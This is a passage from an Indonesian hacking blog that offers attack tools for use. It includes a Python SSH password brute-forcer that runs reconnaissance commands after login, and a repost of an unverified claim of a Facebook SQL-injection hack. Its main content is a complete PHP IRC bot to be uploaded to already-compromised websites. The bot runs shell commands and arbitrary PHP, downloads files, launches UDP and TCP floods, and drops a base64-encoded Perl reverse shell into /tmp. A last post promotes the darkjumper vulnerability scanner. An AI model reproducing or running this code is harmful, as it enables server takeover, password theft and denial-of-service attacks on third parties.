# You can add more commands what do you like ... lol ! :D

perintah = 'uname -a' # kernel version...

perintah2 = 'pwd' # path of you now...

perintah3 = 'ls' # do you see what do you lookin' for ? :P

perintah4 = 'netstat -an | grep -i listen' # see what open port on target...

# End of commands

def brute(word):

print "[?] Trying :",word

try:

s = pxssh.pxssh()

s.login (hostname, user, word, login_timeout=10)

print "\n\t[!] w00t,w00t you've successfully entering SSH target ! "

print "\t[!] Username :",user

print "\t[!] Password :",word, "\n"

print "\t\n [!] Gathering detail target information : "

time.sleep(3) # sorry only refresh your box... :P

# Check usefull commands in line 81 - 84

# You can change with you're command as you like

s.sendline(perintah)

s.prompt()

print "\n",s.before

s.sendline(perintah2)

s.prompt()

print "\n",s.before

s.sendline(perintah3)

s.prompt()

print "\n",s.before

s.sendline(perintah4)

s.prompt()

print "\n",s.before

s.logout()

sys.exit(1)

# End of commands

except Exception, e:

pass

except KeyboardInterrupt:

print "\n[-] Quit\n"

sys.exit(1)

def help ():

print "\nUsage : ./sshbruter.py "

print "Eg: ./sshbruter.py 198.162.1.1 root brutewords.txt\n"

sys.exit(1)

os.system(bersihlayar)

os.system(hapuslog)

os.system(hapusbak)

print "Checking internet connections, please wait alil bit..."

if os.system("ping google.com -c 1"):

os.system(bersihlayar)

print "\nmake sure you checked internet connection...\n"

sys.exit(1)

else:

os.system(bersihlayar)

print "NOW YOU'RE CONNECTED TO INTERNET\n"

time.sleep(1)

print "3"

time.sleep(1)

print "2"

time.sleep(1)

print "1\n"

time.sleep(1)

print "SYSTEM READY FOR BRUTE FORCE ATTACK !\n"

time.sleep(3)

# Sorry once more, timer only make you're system always fresh ! lol :D !

os.system(bersihlayar)

print "\n\t==========================================================="

print "\t Sshbruter.py version 1.0 "

print "\t Brute forcing SSH target then got control to your target :) "

print "\t Programmmer : gunslinger_ "

print "\t gunslinger[at]devilzc0de[dot]com "

print "\t===========================================================\n\n"

if len(sys.argv) != 4 :

help()

hostname = sys.argv[1]

user = sys.argv[2]

try:

words = open(sys.argv[3], "r").readlines()

except(IOError):

print "\n[-] Error : Please check your wordlist path or file name...\n"

sys.exit(1)

print "\n[!] System Activated for brute forcing..."

print "[!] Please wait until brute forcing finish !\n"

time.sleep(3)

print "[+] Loaded :",len(words),"words"

print "[+] Target :",hostname

print "[+] User :",user

print "[+] BruteForcing...\n"

for word in words:

time.sleep(0.1)

brute(word.replace("\n",""))

file.close()

tool diatas untuk brute ssh

selamat mencoba

0 komentar

Facebook Hacked BY bi4kkob4r

Posted on 01.48 by CS-31

Ironis emang Facebook bisa di hack? emang bisa ,ya bisa lah.

Ingat ngak ada system yang 100%aman

gw jamin itu,kenapa karena orang di belakang sysytem itulah yang jadi penentunya .Oke kita bahas aja masalah facebook yang kena hack.Bugs nya adalah sql injection (what the hell?) bener deh sumprit,

Kesalahan fb adalah adanya app facebook yang satu host ma facebook server (sayang ndak tahu app facebook yang mana ) lo itu kan app facebook bukan facebooknya ?.Sabar bro pelan pelan tapi pasti,jadi app yang mengandung bugs sql inject tadi sebagai vuln nya so kalo dah tembus app fcebooknya tinggal jumping ke facebooknya.mantep kali kan.Coba perhatikan baik-baik gambar diatas dengan sekali klik aja facebook langsung undermaintenan salut buat bro BI4KKOB4R.

Yang bikin salut lagi dia nggak langsung bikin ni facebook down kayak hacker iran (teman-temanya CYBERHELL yang suka reseh kalo ada orang ngintip) yang deface twiter kemarin .Ini adalah bukti bahwa IT indonesia itu nggak kacangan sekelas facebook yang bisa di intip bahkan masuk ke admin lagi.jadi gw semanngat lagi.

Analisa diatas cuma rekaan saya dari berbagai sumber yang ada so bisa aja ada teknik lain.And now good night Hati -hati ma facebook anda .

Tapi ini masih menjadi Kontrofersi....soalnya si hacker masih melum nunjukin gimana caranya hacked facebook tersebut (POC)nya belum tau.....

Sumber : http://www.jasakom.com/entry.php?29-Facebook-powned-by-bi4kkob4r

1 komentar

SCRIPT DDOS From JatimCrew

Posted on 23.03 by CS-31

Buat temen2 yang pengen DDOS ini adalah scrip yang telah di buat oleh yang membuat, aku g tau sapa yang membuat yang aku tau ini dari jatimcrew...silakan di coba

code

//login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail //send an email
* .dns //dns lookup
* .download //download a file
* .exec // uses exec() //execute a command
* .sexec // uses shell_exec() //execute a command
* .cmd // uses popen() //execute a command
* .info //get system information
* .php // uses eval() //execute php code
* .tcpflood //tcpflood attack
* .udpflood //udpflood attack
* .raw //raw IRC command
* .rndnick //change nickname
* .pscan //port scan
* .safe // test safe_mode (dvl)
* .inbox // test inbox (dvl)
* .sambung // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
*
*/

set_time_limit(0);
error_reporting(0);
echo "ok!";

class pBot
{
var $config = array("server"=>"SERVER", // ip/host da rede
"port"=>"6667", // porta da rede
"pass"=>"PASSWORDNYA", // senha da rede
"prefix"=>"NAMA BOT", // nick do bot
"maxrand"=>"2", // quantidade de numero no nick do bot
"chan"=>"CHANNEL", // canal que os bots vao entrar
"chan2"=>"CHANNEL", // canal aonde os bots v?o mandar as vulns ao conectar (-n)
"key"=>"senhadocanal", // senha do canal
"modes"=>"+p", // modos do bot
"password"=>"PASSWORD", // senha pra acesso (.user SENHA)
"trigger"=>".", // prefico dos comandos
"hostauth"=>"*" // host dos owners (* for any hostname)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; }
else { $safemode = "OFF"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
$this->privmsg($this->config['chan2'],"Vuln : http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Wawwwwwwwww $nick Bocah Goblok!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: ";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl ",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "sambung":
if(count($mcmd)>2)
{
$this->sambung($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}

case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$iprivmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Proses Mendownload File. Gagal coy permissionnya dilarang.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Proses Mendownload File \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");

}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "A";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "I";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "X";
else
$this->nick = "U";
}
else
{
$this->nick = "C";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Dimulai bom!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],"[\2UdpFlood Selesai!\2]: $env MB DDOS ATTACK / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Dimulai Bos!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Selesai!\2]: Config - $packets pacotes para $host:$port.");
}
function sambung($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2sambung\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}

$bot = new pBot;
$bot->start();

?>

file ini di simpan dendan extensi PHP
kemudian upload ke dalam website yang telah kita inject shell
alangkah baiknya jika kita dapet server yang read only
jadi makin mantep
hahahahha

thanks to bombom jatimcrew, mc-crew.org, n u

untuk lengkapnya silakan download di
http://mc-crew.org/file/Botdos.txt

4 komentar

DARKJUMPER V.4 BY MYWISDOM + USER ENUMERATIONS

Posted on 07.11 by CS-31

Tool name: darkjumper version 4.0
C0d3r: mywisdom (solhack 2004 c0d3r)
Released on: February 2010
Download url:
http://yoyoparty.com/upload/darkjumper.tgz

mirror:

http://fams-online.com/images/darkjumper.tgz

Function(s)
1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server
3. CGI and Path(s) Scanning
Additional feature: 30 fake http user agent(s)

Requirement(s): python > 2.5.x, perl

Ok introducing my new upgraded tool called darkjumper version 4.0. Ok here's a little tutorial about "Using Darkjumper"
This tool can run on linux and windows.

Tutorial for Linux Environment (command line)

oke langsung aja
pertama install dulu perl n pythonnya
==>
$ apt-get install perl
$ apt-get install python

$ wget http://fams-online.com/images/darkjumper.tgz
$ tar zxvf darkjumper.tgz

view source
print?
1 cd darkjumper;ls -la
view source
print?
01 bt next_steps # cd darkjumper
02 bt darkjumper # ls -la
03 total 872
04 drwxr-xr-x 2 turkmentel root 4096 Feb 6 00:38 ./
05 drwxrwxrwx 11 root root 4096 Oct 2 01:19 ../
06 -rwxrwxrwx 1 turkmentel 1001 1727 Feb 5 18:16 cgilist*
07 -rwxrwxrwx 1 root root 485 Jun 8 2009 clearlog.py*
08 -rwxrwxrwx 1 turkmentel 1001 1263 Oct 27 21:58 darkcgi.pl*
09 -rwxrwxrwx 1 root root 35840 Feb 6 00:28 darkjumper.py*
10 -rwxrwxrwx 1 root root 9 Feb 6 00:37 darkjumperlog.txt*
11 -rwxrwxrwx 1 root root 23128 Feb 5 17:29 devilzc0de.py*
12 -rwxrwxrwx 1 root root 57154 Jun 8 2009 shot1.jpg*
13 -rwxrwxrwx 1 root root 141527 Jun 8 2009 shot2.jpg*
14 -rwxrwxrwx 1 root root 255572 Jun 8 2009 shot3.jpg*
15 -rwxrwxrwx 1 root root 188846 Jun 8 2009 shot4.jpg*
16 -rwxrwxrwx 1 root root 101075 Jun 8 2009 shot5.jpg*
17 -rwxrwxrwx 1 root root 4876 Jun 8 2009 subscan.py*
18 -rwxrwxrwx 1 root root 5254 Jun 8 2009 subscan2.py*
19 -rwxrwxrwx 1 root root 5641 Jun 8 2009 tes.py*
20 -rwxrwxrwx 1 root root 5641 Jun 8 2009 tes2.py*
21 bt darkjumper #
kalo mau liat lognya liat langsung aja
pakek ini

view source
print?
1 ./clearlog.py
or : python clearlog.py
darkjumper.py

Here is your main tool.

Ok then you are ready to run darkjumper.py, let's have a try by typing:

view source
print?
1 ./darkjumper.py
And here's the view from my b0x:

selamat men coba

0 komentar

Xr0b0t Website

Sported By

Mengenai Saya

Translator

Labels

Blog Archive

Pengikut

CHAT

LINK FRIENDS

MY FORUM

Powered By

Back Conect Perl IH

Cara Instalasi Mikrotik Sebagai Router

Bot Shell HN

ISP Wajib Serahkan Rekaman Transaksi Koneksi Internet Kepada ID-SIRTII

Easy FTP Server v1.7.0.2 CWD Remote BoF

Root Shell Backdoor

Bug & exploit 2010

pwd-sql py cobak aja

ftp crack login py

SSh Brute dot PY

Facebook Hacked BY bi4kkob4r

SCRIPT DDOS From JatimCrew

DARKJUMPER V.4 BY MYWISDOM + USER ENUMERATIONS